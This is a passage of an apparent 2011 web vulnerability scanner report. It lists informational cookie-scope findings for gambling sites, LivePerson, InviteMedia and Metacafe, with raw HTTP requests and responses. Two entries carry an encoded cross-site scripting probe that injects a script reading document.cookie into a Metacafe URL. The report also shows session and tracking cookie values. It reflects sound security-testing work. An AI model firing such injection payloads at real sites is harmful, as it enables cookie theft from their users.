Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 16 May 2011 12:51:52 GMT
Server: QS

GIF89a.......,.................D..;

11.67. http://pt.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.68. http://pt.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=noicjv45pm3igo55xdqqujbl; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:01:31 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: UniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.69. http://pt.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w4te23y1zi5nuxrpfwibpqbn; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: UniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.70. http://pt.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ezix3mzcpqnyv3il13wvcqv; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.71. http://server.iad.liveperson.net/hc/15712222/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/15712222/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagStartPage&lpCallId=120615486754-137820172356&protV=20&lpjson=1&page=http%3A//www.scratchcardheaven.com/&id=636622910&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&title=Online%20Scratch%20cards%2C%20featuring%20over%2080%20flash%20Scratch%20games%20and%20scratch%20off%20tickets%20%u2013%20scratchcardheaven.com%20Scratchcards HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scratchcardheaven.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4711607244455630702; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305546129531

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101514677756-1305546140:0; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Set-Cookie: HumanClickKEY=4711607244455630702; path=/hc/15712222
Set-Cookie: HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
Set-Cookie: LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:42:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"120615486754-137820172356","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

11.72. http://solutions.liveperson.com/ref/lppb.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQACDBBC=JOFLNHKAJGJGGOBMPFBILGBN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

11.73. http://sv.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tozxwiay5gsnm045qnofca45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.74. http://sv.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=azgunk45evet2e2lc4weniil; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=9F2E93BD550A418B6C8B77D320264753&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:12 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: UniqueVisitorID=9F2E93BD550A418B6C8B77D320264753; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.75. http://sv.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fndj2f45vfptvambh31xbrbd; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=2F88B34160D1FB90561B679A38A912E9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:53 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: UniqueVisitorID=2F88B34160D1FB90561B679A38A912E9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.76. http://sv.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gwthtzz40d422xm4dak1bp45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: UniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.77. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.78. http://winter.metacafe.com/Openx/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://winter.metacafe.com
Path:   /Openx/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Openx/www/delivery/lg.php?bannerid=10601&campaignid=5097&zoneid=263&source=;number-0;ff-on;LEID-40;pageType-home;sessions-1;header-http://www.metacafe.com;metacafe.com;playerType-Portal;public-no;userStatus=Anonymous&loc=1&referer=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1&cb=e9bcf54a47 HTTP/1.1
Host: winter.metacafe.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ba2c139c5c43d415b4eb00c8050858e; OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=c28c03f15174f432a7be750cb01c8ecd; User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2289a4d803e9538a86501013a4c90d08fa%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c28c03f15174f432a7be750cb01c8ecd; expires=Tue, 15-May-2012 12:49:29 GMT; path=/; domain=.metacafe.com
Content-Length: 43
Vary: Accept-Encoding,User-Agent
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.79. http://www.bigmoneyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bigmoneyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
